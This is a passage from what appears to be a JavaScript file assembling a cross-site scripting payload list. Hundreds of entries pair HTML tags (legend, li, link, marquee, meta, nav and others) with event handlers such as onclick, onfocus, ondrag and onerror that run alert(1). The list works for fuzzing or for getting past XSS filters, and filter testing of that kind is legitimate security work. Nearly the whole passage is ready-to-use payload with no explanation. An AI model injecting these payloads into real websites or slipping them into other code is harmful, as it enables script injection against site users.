onfocusin=alert(1)></legend>' +xss,'<legend onbeforecopy="alert(1)" contenteditable>test</legend>' +xss,'<legend onbeforecut="alert(1)" contenteditable>test</legend>' +xss,'<legend onbeforepaste="alert(1)" contenteditable>test</legend>' +xss,'<legend onblur=alert(1) tabindex=1 id=x></legend><input autofocus>' +xss,'<legend onclick="alert(1)">test</legend>' +xss,'<legend oncontextmenu="alert(1)">test</legend>' +xss,'<legend oncopy="alert(1)" contenteditable>test</legend>' +xss,'<legend oncut="alert(1)" contenteditable>test</legend>' +xss,'<legend ondblclick="alert(1)">test</legend>' +xss,'<legend onfocusout=alert(1) tabindex=1 id=x></legend><input autofocus>' +xss,'<legend onkeydown="alert(1)" contenteditable>test</legend>' +xss,'<legend onkeypress="alert(1)" contenteditable>test</legend>' +xss,'<legend onkeyup="alert(1)" contenteditable>test</legend>' +xss,'<legend onmousedown="alert(1)">test</legend>' +xss,'<legend onmouseenter="alert(1)">test</legend>' +xss,'<legend onmouseleave="alert(1)">test</legend>' +xss,'<legend onmousemove="alert(1)">test</legend>' +xss,'<legend onmouseout="alert(1)">test</legend>' +xss,'<legend onmouseover="alert(1)">test</legend>' +xss,'<legend onmouseup="alert(1)">test</legend>' +xss,'<legend onpaste="alert(1)" contenteditable>test</legend>' +xss,'<li draggable="true" ondrag="alert(1)">test</li>' +xss,'<li draggable="true" ondragend="alert(1)">test</li>' +xss,'<li draggable="true" ondragenter="alert(1)">test</li>' +xss,'<li draggable="true" ondragleave="alert(1)">test</li>' +xss,'<li draggable="true" ondragstart="alert(1)">test</li>' +xss,'<li id=x tabindex=1 onactivate=alert(1)></li>' +xss,'<li id=x tabindex=1 onbeforeactivate=alert(1)></li>' +xss,'<li id=x tabindex=1 onbeforedeactivate=alert(1)></li><input autofocus>' +xss,'<li id=x tabindex=1 ondeactivate=alert(1)></li><input id=y autofocus>' +xss,'<li id=x tabindex=1 onfocus=alert(1)></li>' +xss,'<li id=x tabindex=1 onfocusin=alert(1)></li>' +xss,'<li onbeforecopy="alert(1)" contenteditable>test</li>' +xss,'<li onbeforecut="alert(1)" contenteditable>test</li>' +xss,'<li onbeforepaste="alert(1)" contenteditable>test</li>' +xss,'<li onblur=alert(1) tabindex=1 id=x></li><input autofocus>' +xss,'<li onclick="alert(1)">test</li>' +xss,'<li oncontextmenu="alert(1)">test</li>' +xss,'<li oncopy="alert(1)" contenteditable>test</li>' +xss,'<li oncut="alert(1)" contenteditable>test</li>' +xss,'<li ondblclick="alert(1)">test</li>' +xss,'<li onfocusout=alert(1) tabindex=1 id=x></li><input autofocus>' +xss,'<li onkeydown="alert(1)" contenteditable>test</li>' +xss,'<li onkeypress="alert(1)" contenteditable>test</li>' +xss,'<li onkeyup="alert(1)" contenteditable>test</li>' +xss,'<li onmousedown="alert(1)">test</li>' +xss,'<li onmouseenter="alert(1)">test</li>' +xss,'<li onmouseleave="alert(1)">test</li>' +xss,'<li onmousemove="alert(1)">test</li>' +xss,'<li onmouseout="alert(1)">test</li>' +xss,'<li onmouseover="alert(1)">test</li>' +xss,'<li onmouseup="alert(1)">test</li>' +xss,'<li onpaste="alert(1)" contenteditable>test</li>' +xss,'<link draggable="true" ondrag="alert(1)">test</link>' +xss,'<link draggable="true" ondragend="alert(1)">test</link>' +xss,'<link draggable="true" ondragenter="alert(1)">test</link>' +xss,'<link draggable="true" ondragleave="alert(1)">test</link>' +xss,'<link draggable="true" ondragstart="alert(1)">test</link>' +xss,'<link href=validstyles.css rel=stylesheet onload=alert(1)>' +xss,'<link id=x tabindex=1 onactivate=alert(1)></link>' +xss,'<link id=x tabindex=1 onbeforeactivate=alert(1)></link>' +xss,'<link id=x tabindex=1 onbeforedeactivate=alert(1)></link><input autofocus>' +xss,'<link id=x tabindex=1 ondeactivate=alert(1)></link><input id=y autofocus>' +xss,'<link onbeforecopy="alert(1)" contenteditable>test</link>' +xss,'<link onbeforecut="alert(1)" contenteditable>test</link>' +xss,'<link onbeforepaste="alert(1)" contenteditable>test</link>' +xss,'<link onblur=alert(1) tabindex=1 id=x></link><input autofocus>' +xss,'<link onclick="alert(1)">test</link>' +xss,'<link oncontextmenu="alert(1)">test</link>' +xss,'<link oncopy="alert(1)" contenteditable>test</link>' +xss,'<link oncut="alert(1)" contenteditable>test</link>' +xss,'<link ondblclick="alert(1)">test</link>' +xss,'<link onfocus=alert(1) id=x tabindex=1 style=display:block>' +xss,'<link onfocusin=alert(1) id=x tabindex=1 style=display:block>' +xss,'<link onfocusout=alert(1) tabindex=1 id=x></link><input autofocus>' +xss,'<link onkeydown="alert(1)" contenteditable>test</link>' +xss,'<link onkeypress="alert(1)" contenteditable>test</link>' +xss,'<link onkeyup="alert(1)" contenteditable>test</link>' +xss,'<link onmousedown="alert(1)">test</link>' +xss,'<link onmouseenter="alert(1)">test</link>' +xss,'<link onmouseleave="alert(1)">test</link>' +xss,'<link onmousemove="alert(1)">test</link>' +xss,'<link onmouseout="alert(1)">test</link>' +xss,'<link onmouseover="alert(1)">test</link>' +xss,'<link onmouseup="alert(1)">test</link>' +xss,'<link onpaste="alert(1)" contenteditable>test</link>' +xss,'<link onreadystatechange=alert(1) rel=stylesheet href=1>' +xss,'<link rel=stylesheet href=1 onerror=alert(1)>' +xss,'<listing draggable="true" ondrag="alert(1)">test</listing>' +xss,'<listing draggable="true" ondragend="alert(1)">test</listing>' +xss,'<listing draggable="true" ondragenter="alert(1)">test</listing>' +xss,'<listing draggable="true" ondragleave="alert(1)">test</listing>' +xss,'<listing draggable="true" ondragstart="alert(1)">test</listing>' +xss,'<listing id=x tabindex=1 onactivate=alert(1)></listing>' +xss,'<listing id=x tabindex=1 onbeforeactivate=alert(1)></listing>' +xss,'<listing id=x tabindex=1 onbeforedeactivate=alert(1)></listing><input autofocus>' +xss,'<listing id=x tabindex=1 ondeactivate=alert(1)></listing><input id=y autofocus>' +xss,'<listing id=x tabindex=1 onfocus=alert(1)></listing>' +xss,'<listing id=x tabindex=1 onfocusin=alert(1)></listing>' +xss,'<listing onbeforecopy="alert(1)" contenteditable>test</listing>' +xss,'<listing onbeforecut="alert(1)" contenteditable>test</listing>' +xss,'<listing onbeforepaste="alert(1)" contenteditable>test</listing>' +xss,'<listing onblur=alert(1) tabindex=1 id=x></listing><input autofocus>' +xss,'<listing onclick="alert(1)">test</listing>' +xss,'<listing oncontextmenu="alert(1)">test</listing>' +xss,'<listing oncopy="alert(1)" contenteditable>test</listing>' +xss,'<listing oncut="alert(1)" contenteditable>test</listing>' +xss,'<listing ondblclick="alert(1)">test</listing>' +xss,'<listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus>' +xss,'<listing onkeydown="alert(1)" contenteditable>test</listing>' +xss,'<listing onkeypress="alert(1)" contenteditable>test</listing>' +xss,'<listing onkeyup="alert(1)" contenteditable>test</listing>' +xss,'<listing onmousedown="alert(1)">test</listing>' +xss,'<listing onmouseenter="alert(1)">test</listing>' +xss,'<listing onmouseleave="alert(1)">test</listing>' +xss,'<listing onmousemove="alert(1)">test</listing>' +xss,'<listing onmouseout="alert(1)">test</listing>' +xss,'<listing onmouseover="alert(1)">test</listing>' +xss,'<listing onmouseup="alert(1)">test</listing>' +xss,'<listing onpaste="alert(1)" contenteditable>test</listing>' +xss,'<main draggable="true" ondrag="alert(1)">test</main>' +xss,'<main draggable="true" ondragend="alert(1)">test</main>' +xss,'<main draggable="true" ondragenter="alert(1)">test</main>' +xss,'<main draggable="true" ondragleave="alert(1)">test</main>' +xss,'<main draggable="true" ondragstart="alert(1)">test</main>' +xss,'<main id=x tabindex=1 onactivate=alert(1)></main>' +xss,'<main id=x tabindex=1 onbeforeactivate=alert(1)></main>' +xss,'<main id=x tabindex=1 onbeforedeactivate=alert(1)></main><input autofocus>' +xss,'<main id=x tabindex=1 ondeactivate=alert(1)></main><input id=y autofocus>' +xss,'<main id=x tabindex=1 onfocus=alert(1)></main>' +xss,'<main id=x tabindex=1 onfocusin=alert(1)></main>' +xss,'<main onbeforecopy="alert(1)" contenteditable>test</main>' +xss,'<main onbeforecut="alert(1)" contenteditable>test</main>' +xss,'<main onbeforepaste="alert(1)" contenteditable>test</main>' +xss,'<main onblur=alert(1) tabindex=1 id=x></main><input autofocus>' +xss,'<main onclick="alert(1)">test</main>' +xss,'<main oncontextmenu="alert(1)">test</main>' +xss,'<main oncopy="alert(1)" contenteditable>test</main>' +xss,'<main oncut="alert(1)" contenteditable>test</main>' +xss,'<main ondblclick="alert(1)">test</main>' +xss,'<main onfocusout=alert(1) tabindex=1 id=x></main><input autofocus>' +xss,'<main onkeydown="alert(1)" contenteditable>test</main>' +xss,'<main onkeypress="alert(1)" contenteditable>test</main>' +xss,'<main onkeyup="alert(1)" contenteditable>test</main>' +xss,'<main onmousedown="alert(1)">test</main>' +xss,'<main onmouseenter="alert(1)">test</main>' +xss,'<main onmouseleave="alert(1)">test</main>' +xss,'<main onmousemove="alert(1)">test</main>' +xss,'<main onmouseout="alert(1)">test</main>' +xss,'<main onmouseover="alert(1)">test</main>' +xss,'<main onmouseup="alert(1)">test</main>' +xss,'<main onpaste="alert(1)" contenteditable>test</main>' +xss,'<map draggable="true" ondrag="alert(1)">test</map>' +xss,'<map draggable="true" ondragend="alert(1)">test</map>' +xss,'<map draggable="true" ondragenter="alert(1)">test</map>' +xss,'<map draggable="true" ondragleave="alert(1)">test</map>' +xss,'<map draggable="true" ondragstart="alert(1)">test</map>' +xss,'<map id=x tabindex=1 onactivate=alert(1)></map>' +xss,'<map id=x tabindex=1 onbeforeactivate=alert(1)></map>' +xss,'<map id=x tabindex=1 onbeforedeactivate=alert(1)></map><input autofocus>' +xss,'<map id=x tabindex=1 ondeactivate=alert(1)></map><input id=y autofocus>' +xss,'<map id=x tabindex=1 onfocus=alert(1)></map>' +xss,'<map id=x tabindex=1 onfocusin=alert(1)></map>' +xss,'<map onbeforecopy="alert(1)" contenteditable>test</map>' +xss,'<map onbeforecut="alert(1)" contenteditable>test</map>' +xss,'<map onbeforepaste="alert(1)" contenteditable>test</map>' +xss,'<map onblur=alert(1) tabindex=1 id=x></map><input autofocus>' +xss,'<map onclick="alert(1)">test</map>' +xss,'<map oncontextmenu="alert(1)">test</map>' +xss,'<map oncopy="alert(1)" contenteditable>test</map>' +xss,'<map oncut="alert(1)" contenteditable>test</map>' +xss,'<map ondblclick="alert(1)">test</map>' +xss,'<map onfocusout=alert(1) tabindex=1 id=x></map><input autofocus>' +xss,'<map onkeydown="alert(1)" contenteditable>test</map>' +xss,'<map onkeypress="alert(1)" contenteditable>test</map>' +xss,'<map onkeyup="alert(1)" contenteditable>test</map>' +xss,'<map onmousedown="alert(1)">test</map>' +xss,'<map onmouseenter="alert(1)">test</map>' +xss,'<map onmouseleave="alert(1)">test</map>' +xss,'<map onmousemove="alert(1)">test</map>' +xss,'<map onmouseout="alert(1)">test</map>' +xss,'<map onmouseover="alert(1)">test</map>' +xss,'<map onmouseup="alert(1)">test</map>' +xss,'<map onpaste="alert(1)" contenteditable>test</map>' +xss,'<mark draggable="true" ondrag="alert(1)">test</mark>' +xss,'<mark draggable="true" ondragend="alert(1)">test</mark>' +xss,'<mark draggable="true" ondragenter="alert(1)">test</mark>' +xss,'<mark draggable="true" ondragleave="alert(1)">test</mark>' +xss,'<mark draggable="true" ondragstart="alert(1)">test</mark>' +xss,'<mark id=x tabindex=1 onactivate=alert(1)></mark>' +xss,'<mark id=x tabindex=1 onbeforeactivate=alert(1)></mark>' +xss,'<mark id=x tabindex=1 onbeforedeactivate=alert(1)></mark><input autofocus>' +xss,'<mark id=x tabindex=1 ondeactivate=alert(1)></mark><input id=y autofocus>' +xss,'<mark id=x tabindex=1 onfocus=alert(1)></mark>' +xss,'<mark id=x tabindex=1 onfocusin=alert(1)></mark>' +xss,'<mark onbeforecopy="alert(1)" contenteditable>test</mark>' +xss,'<mark onbeforecut="alert(1)" contenteditable>test</mark>' +xss,'<mark onbeforepaste="alert(1)" contenteditable>test</mark>' +xss,'<mark onblur=alert(1) tabindex=1 id=x></mark><input autofocus>' +xss,'<mark onclick="alert(1)">test</mark>' +xss,'<mark oncontextmenu="alert(1)">test</mark>' +xss,'<mark oncopy="alert(1)" contenteditable>test</mark>' +xss,'<mark oncut="alert(1)" contenteditable>test</mark>' +xss,'<mark ondblclick="alert(1)">test</mark>' +xss,'<mark onfocusout=alert(1) tabindex=1 id=x></mark><input autofocus>' +xss,'<mark onkeydown="alert(1)" contenteditable>test</mark>' +xss,'<mark onkeypress="alert(1)" contenteditable>test</mark>' +xss,'<mark onkeyup="alert(1)" contenteditable>test</mark>' +xss,'<mark onmousedown="alert(1)">test</mark>' +xss,'<mark onmouseenter="alert(1)">test</mark>' +xss,'<mark onmouseleave="alert(1)">test</mark>' +xss,'<mark onmousemove="alert(1)">test</mark>' +xss,'<mark onmouseout="alert(1)">test</mark>' +xss,'<mark onmouseover="alert(1)">test</mark>' +xss,'<mark onmouseup="alert(1)">test</mark>' +xss,'<mark onpaste="alert(1)" contenteditable>test</mark>' +xss,'<marquee draggable="true" ondrag="alert(1)">test</marquee>' +xss,'<marquee draggable="true" ondragend="alert(1)">test</marquee>' +xss,'<marquee draggable="true" ondragenter="alert(1)">test</marquee>' +xss,'<marquee draggable="true" ondragleave="alert(1)">test</marquee>' +xss,'<marquee draggable="true" ondragstart="alert(1)">test</marquee>' +xss,'<marquee id=x tabindex=1 onactivate=alert(1)></marquee>' +xss,'<marquee id=x tabindex=1 onbeforeactivate=alert(1)></marquee>' +xss,'<marquee id=x tabindex=1 onbeforedeactivate=alert(1)></marquee><input autofocus>' +xss,'<marquee id=x tabindex=1 ondeactivate=alert(1)></marquee><input id=y autofocus>' +xss,'<marquee id=x tabindex=1 onfocus=alert(1)></marquee>' +xss,'<marquee id=x tabindex=1 onfocusin=alert(1)></marquee>' +xss,'<marquee onbeforecopy="alert(1)" contenteditable>test</marquee>' +xss,'<marquee onbeforecut="alert(1)" contenteditable>test</marquee>' +xss,'<marquee onbeforepaste="alert(1)" contenteditable>test</marquee>' +xss,'<marquee onblur=alert(1) tabindex=1 id=x></marquee><input autofocus>' +xss,'<marquee onclick="alert(1)">test</marquee>' +xss,'<marquee oncontextmenu="alert(1)">test</marquee>' +xss,'<marquee oncopy="alert(1)" contenteditable>test</marquee>' +xss,'<marquee oncut="alert(1)" contenteditable>test</marquee>' +xss,'<marquee ondblclick="alert(1)">test</marquee>' +xss,'<marquee onfocusout=alert(1) tabindex=1 id=x></marquee><input autofocus>' +xss,'<marquee onkeydown="alert(1)" contenteditable>test</marquee>' +xss,'<marquee onkeypress="alert(1)" contenteditable>test</marquee>' +xss,'<marquee onkeyup="alert(1)" contenteditable>test</marquee>' +xss,'<marquee onmousedown="alert(1)">test</marquee>' +xss,'<marquee onmouseenter="alert(1)">test</marquee>' +xss,'<marquee onmouseleave="alert(1)">test</marquee>' +xss,'<marquee onmousemove="alert(1)">test</marquee>' +xss,'<marquee onmouseout="alert(1)">test</marquee>' +xss,'<marquee onmouseover="alert(1)">test</marquee>' +xss,'<marquee onmouseup="alert(1)">test</marquee>' +xss,'<marquee onpaste="alert(1)" contenteditable>test</marquee>' +xss,'<marquee onstart=alert(1)>XSS</marquee>' +xss,'<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee>' +xss,'<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>' +xss,'<menu draggable="true" ondrag="alert(1)">test</menu>' +xss,'<menu draggable="true" ondragend="alert(1)">test</menu>' +xss,'<menu draggable="true" ondragenter="alert(1)">test</menu>' +xss,'<menu draggable="true" ondragleave="alert(1)">test</menu>' +xss,'<menu draggable="true" ondragstart="alert(1)">test</menu>' +xss,'<menu id=x tabindex=1 onactivate=alert(1)></menu>' +xss,'<menu id=x tabindex=1 onbeforeactivate=alert(1)></menu>' +xss,'<menu id=x tabindex=1 onbeforedeactivate=alert(1)></menu><input autofocus>' +xss,'<menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus>' +xss,'<menu id=x tabindex=1 onfocus=alert(1)></menu>' +xss,'<menu id=x tabindex=1 onfocusin=alert(1)></menu>' +xss,'<menu onbeforecopy="alert(1)" contenteditable>test</menu>' +xss,'<menu onbeforecut="alert(1)" contenteditable>test</menu>' +xss,'<menu onbeforepaste="alert(1)" contenteditable>test</menu>' +xss,'<menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus>' +xss,'<menu onclick="alert(1)">test</menu>' +xss,'<menu oncontextmenu="alert(1)">test</menu>' +xss,'<menu oncopy="alert(1)" contenteditable>test</menu>' +xss,'<menu oncut="alert(1)" contenteditable>test</menu>' +xss,'<menu ondblclick="alert(1)">test</menu>' +xss,'<menu onfocusout=alert(1) tabindex=1 id=x></menu><input autofocus>' +xss,'<menu onkeydown="alert(1)" contenteditable>test</menu>' +xss,'<menu onkeypress="alert(1)" contenteditable>test</menu>' +xss,'<menu onkeyup="alert(1)" contenteditable>test</menu>' +xss,'<menu onmousedown="alert(1)">test</menu>' +xss,'<menu onmouseenter="alert(1)">test</menu>' +xss,'<menu onmouseleave="alert(1)">test</menu>' +xss,'<menu onmousemove="alert(1)">test</menu>' +xss,'<menu onmouseout="alert(1)">test</menu>' +xss,'<menu onmouseover="alert(1)">test</menu>' +xss,'<menu onmouseup="alert(1)">test</menu>' +xss,'<menu onpaste="alert(1)" contenteditable>test</menu>' +xss,'<menuitem draggable="true" ondrag="alert(1)">test</menuitem>' +xss,'<menuitem draggable="true" ondragend="alert(1)">test</menuitem>' +xss,'<menuitem draggable="true" ondragenter="alert(1)">test</menuitem>' +xss,'<menuitem draggable="true" ondragleave="alert(1)">test</menuitem>' +xss,'<menuitem draggable="true" ondragstart="alert(1)">test</menuitem>' +xss,'<menuitem id=x tabindex=1 onactivate=alert(1)></menuitem>' +xss,'<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem>' +xss,'<menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus>' +xss,'<menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus>' +xss,'<menuitem id=x tabindex=1 onfocus=alert(1)></menuitem>' +xss,'<menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem>' +xss,'<menuitem onbeforecopy="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem onbeforecut="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem onbeforepaste="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus>' +xss,'<menuitem onclick="alert(1)">test</menuitem>' +xss,'<menuitem oncontextmenu="alert(1)">test</menuitem>' +xss,'<menuitem oncopy="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem oncut="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem ondblclick="alert(1)">test</menuitem>' +xss,'<menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus>' +xss,'<menuitem onkeydown="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem onkeypress="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem onkeyup="alert(1)" contenteditable>test</menuitem>' +xss,'<menuitem onmousedown="alert(1)">test</menuitem>' +xss,'<menuitem onmouseenter="alert(1)">test</menuitem>' +xss,'<menuitem onmouseleave="alert(1)">test</menuitem>' +xss,'<menuitem onmousemove="alert(1)">test</menuitem>' +xss,'<menuitem onmouseout="alert(1)">test</menuitem>' +xss,'<menuitem onmouseover="alert(1)">test</menuitem>' +xss,'<menuitem onmouseup="alert(1)">test</menuitem>' +xss,'<menuitem onpaste="alert(1)" contenteditable>test</menuitem>' +xss,'<meta draggable="true" ondrag="alert(1)">test</meta>' +xss,'<meta draggable="true" ondragend="alert(1)">test</meta>' +xss,'<meta draggable="true" ondragenter="alert(1)">test</meta>' +xss,'<meta draggable="true" ondragleave="alert(1)">test</meta>' +xss,'<meta draggable="true" ondragstart="alert(1)">test</meta>' +xss,'<meta id=x tabindex=1 onactivate=alert(1)></meta>' +xss,'<meta id=x tabindex=1 onbeforeactivate=alert(1)></meta>' +xss,'<meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus>' +xss,'<meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus>' +xss,'<meta id=x tabindex=1 onfocus=alert(1)></meta>' +xss,'<meta id=x tabindex=1 onfocusin=alert(1)></meta>' +xss,'<meta onbeforecopy="alert(1)" contenteditable>test</meta>' +xss,'<meta onbeforecut="alert(1)" contenteditable>test</meta>' +xss,'<meta onbeforepaste="alert(1)" contenteditable>test</meta>' +xss,'<meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus>' +xss,'<meta onclick="alert(1)">test</meta>' +xss,'<meta oncontextmenu="alert(1)">test</meta>' +xss,'<meta oncopy="alert(1)" contenteditable>test</meta>' +xss,'<meta oncut="alert(1)" contenteditable>test</meta>' +xss,'<meta ondblclick="alert(1)">test</meta>' +xss,'<meta onfocusout=alert(1) tabindex=1 id=x></meta><input autofocus>' +xss,'<meta onkeydown="alert(1)" contenteditable>test</meta>' +xss,'<meta onkeypress="alert(1)" contenteditable>test</meta>' +xss,'<meta onkeyup="alert(1)" contenteditable>test</meta>' +xss,'<meta onmousedown="alert(1)">test</meta>' +xss,'<meta onmouseenter="alert(1)">test</meta>' +xss,'<meta onmouseleave="alert(1)">test</meta>' +xss,'<meta onmousemove="alert(1)">test</meta>' +xss,'<meta onmouseout="alert(1)">test</meta>' +xss,'<meta onmouseover="alert(1)">test</meta>' +xss,'<meta onmouseup="alert(1)">test</meta>' +xss,'<meta onpaste="alert(1)" contenteditable>test</meta>' +xss,'<meter draggable="true" ondrag="alert(1)">test</meter>' +xss,'<meter draggable="true" ondragend="alert(1)">test</meter>' +xss,'<meter draggable="true" ondragenter="alert(1)">test</meter>' +xss,'<meter draggable="true" ondragleave="alert(1)">test</meter>' +xss,'<meter draggable="true" ondragstart="alert(1)">test</meter>' +xss,'<meter id=x tabindex=1 onactivate=alert(1)></meter>' +xss,'<meter id=x tabindex=1 onbeforeactivate=alert(1)></meter>' +xss,'<meter id=x tabindex=1 onbeforedeactivate=alert(1)></meter><input autofocus>' +xss,'<meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus>' +xss,'<meter id=x tabindex=1 onfocus=alert(1)></meter>' +xss,'<meter id=x tabindex=1 onfocusin=alert(1)></meter>' +xss,'<meter onbeforecopy="alert(1)" contenteditable>test</meter>' +xss,'<meter onbeforecut="alert(1)" contenteditable>test</meter>' +xss,'<meter onbeforepaste="alert(1)" contenteditable>test</meter>' +xss,'<meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus>' +xss,'<meter onclick="alert(1)">test</meter>' +xss,'<meter oncontextmenu="alert(1)">test</meter>' +xss,'<meter oncopy="alert(1)" contenteditable>test</meter>' +xss,'<meter oncut="alert(1)" contenteditable>test</meter>' +xss,'<meter ondblclick="alert(1)">test</meter>' +xss,'<meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus>' +xss,'<meter onkeydown="alert(1)" contenteditable>test</meter>' +xss,'<meter onkeypress="alert(1)" contenteditable>test</meter>' +xss,'<meter onkeyup="alert(1)" contenteditable>test</meter>' +xss,'<meter onmousedown="alert(1)">test</meter>' +xss,'<meter onmouseenter="alert(1)">test</meter>' +xss,'<meter onmouseleave="alert(1)">test</meter>' +xss,'<meter onmousemove="alert(1)">test</meter>' +xss,'<meter onmouseout="alert(1)">test</meter>' +xss,'<meter onmouseover="alert(1)">test</meter>' +xss,'<meter onmouseup="alert(1)">test</meter>' +xss,'<meter onpaste="alert(1)" contenteditable>test</meter>' +xss,'<multicol draggable="true" ondrag="alert(1)">test</multicol>' +xss,'<multicol draggable="true" ondragend="alert(1)">test</multicol>' +xss,'<multicol draggable="true" ondragenter="alert(1)">test</multicol>' +xss,'<multicol draggable="true" ondragleave="alert(1)">test</multicol>' +xss,'<multicol draggable="true" ondragstart="alert(1)">test</multicol>' +xss,'<multicol id=x tabindex=1 onactivate=alert(1)></multicol>' +xss,'<multicol id=x tabindex=1 onbeforeactivate=alert(1)></multicol>' +xss,'<multicol id=x tabindex=1 onbeforedeactivate=alert(1)></multicol><input autofocus>' +xss,'<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus>' +xss,'<multicol id=x tabindex=1 onfocus=alert(1)></multicol>' +xss,'<multicol id=x tabindex=1 onfocusin=alert(1)></multicol>' +xss,'<multicol onbeforecopy="alert(1)" contenteditable>test</multicol>' +xss,'<multicol onbeforecut="alert(1)" contenteditable>test</multicol>' +xss,'<multicol onbeforepaste="alert(1)" contenteditable>test</multicol>' +xss,'<multicol onblur=alert(1) tabindex=1 id=x></multicol><input autofocus>' +xss,'<multicol onclick="alert(1)">test</multicol>' +xss,'<multicol oncontextmenu="alert(1)">test</multicol>' +xss,'<multicol oncopy="alert(1)" contenteditable>test</multicol>' +xss,'<multicol oncut="alert(1)" contenteditable>test</multicol>' +xss,'<multicol ondblclick="alert(1)">test</multicol>' +xss,'<multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus>' +xss,'<multicol onkeydown="alert(1)" contenteditable>test</multicol>' +xss,'<multicol onkeypress="alert(1)" contenteditable>test</multicol>' +xss,'<multicol onkeyup="alert(1)" contenteditable>test</multicol>' +xss,'<multicol onmousedown="alert(1)">test</multicol>' +xss,'<multicol onmouseenter="alert(1)">test</multicol>' +xss,'<multicol onmouseleave="alert(1)">test</multicol>' +xss,'<multicol onmousemove="alert(1)">test</multicol>' +xss,'<multicol onmouseout="alert(1)">test</multicol>' +xss,'<multicol onmouseover="alert(1)">test</multicol>' +xss,'<multicol onmouseup="alert(1)">test</multicol>' +xss,'<multicol onpaste="alert(1)" contenteditable>test</multicol>' +xss,'<nav draggable="true" ondrag="alert(1)">test</nav>' +xss,'<nav draggable="true" ondragend="alert(1)">test</nav>' +xss,'<nav draggable="true" ondragenter="alert(1)">test</nav>' +xss,'<nav draggable="true" ondragleave="alert(1)">test</nav>' +xss,'<nav draggable="true" ondragstart="alert(1)">test</nav>' +xss,'<nav id=x tabindex=1 onactivate=alert(1)></nav>' +xss,'<nav id=x tabindex=1 onbeforeactivate=alert(1)></nav>' +xss,'<nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus>' +xss,'<nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus>' +xss,'<nav id=x tabindex=1 onfocus=alert(1)></nav>' +xss,'<nav id=x tabindex=1 onfocusin=alert(1)></nav>' +xss,'<nav onbeforecopy="alert(1)" contenteditable>test</nav>' +xss,'<nav onbeforecut="alert(1)" contenteditable>test</nav>' +xss,'<nav onbeforepaste="alert(1)" contenteditable>test</nav>' +xss,'<nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus>' +xss,'<nav onclick="alert(1)">test</nav>' +xss,'<nav oncontextmenu="alert(1)">test</nav>' +xss,'<nav oncopy="alert(1)" contenteditable>test</nav>' +xss,'<nav oncut="alert(1)" contenteditable>test</nav>' +xss,'<nav ondblclick="alert(1)">test</nav>' +xss,'<nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus>' +xss,'<nav onkeydown="alert(1)" contenteditable>test</nav>' +xss,'<nav onkeypress="alert(1)" contenteditable>test</nav>' +xss,'<nav onkeyup="alert(1)" contenteditable>test</nav>' +xss,'<nav onmousedown="alert(1)">test</nav>' +xss,'<nav onmouseenter="alert(1)">test</nav>' +xss,'<nav onmouseleave="alert(1)">test</nav>' +xss,'<nav onmousemove="alert(1)">test</nav>' +xss,'<nav onmouseout="alert(1)">test</nav>' +xss,'<nav onmouseover="alert(1)">test</nav>' +xss,'<nav onmouseup="alert(1)">test</nav>' +xss,'<nav onpaste="alert(1)" contenteditable>test</nav>' +xss,'<nextid draggable="true" ondrag="alert(1)">test</nextid>' +xss,'<nextid draggable="true" ondragend="alert(1)">test</nextid>' +xss,'<nextid draggable="true" ondragenter="alert(1)">test</nextid>' +xss,'<nextid draggable="true" ondragleave="alert(1)">test</nextid>' +xss,'<nextid draggable="true" ondragstart="alert(1)">test</nextid>' +xss,'<nextid id=x tabindex=1 onactivate=alert(1)></nextid>' +xss,'<nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid>' +xss,'<nextid id=x tabindex=1 onbeforedeactivate=alert(1)></nextid><input autofocus>' +xss,'<nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus>' +xss,'<nextid id=x tabindex=1 onfocus=alert(1)></nextid>' +xss,'<nextid id=x tabindex=1 onfocusin=alert(1)></nextid>' +xss,'<nextid onbeforecopy="alert(1)" contenteditable>test</nextid>' +xss,'<nextid onbeforecut="alert(1)" contenteditable>test</nextid>' +xss,'<nextid onbeforepaste="alert(1)" contenteditable>test</nextid>' +xss,'<nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus>' +xss,'<nextid onclick="alert(1)">test</nextid>' +xss,'<nextid oncontextmenu="alert(1)">test</nextid>' +xss,'<nextid oncopy="alert(1)" contenteditable>test</nextid>' +xss,'<nextid oncut="alert(1)" contenteditable>test</nextid>' +xss,'<nextid ondblclick="alert(1)">test</nextid>' +xss,'<nextid onfocusout=alert(1) tabindex=1 id=x></nextid><input autofocus>' +xss,'<nextid onkeydown="alert(1)" contenteditable>test</nextid>' +xss,'<nextid onkeypress="alert(1)" contenteditable>test</nextid>' +xss,'<nextid onkeyup="alert(1)" contenteditable>test</nextid>' +xss,'<nextid onmousedown="alert(1)">test</nextid>' +xss,'<nextid onmouseenter="alert(1)">test</nextid>' +xss,'<nextid onmouseleave="alert(1)">test</nextid>' +xss,'<nextid onmousemove="alert(1)">test</nextid>' +xss,'<nextid onmouseout="alert(1)">test</nextid>' 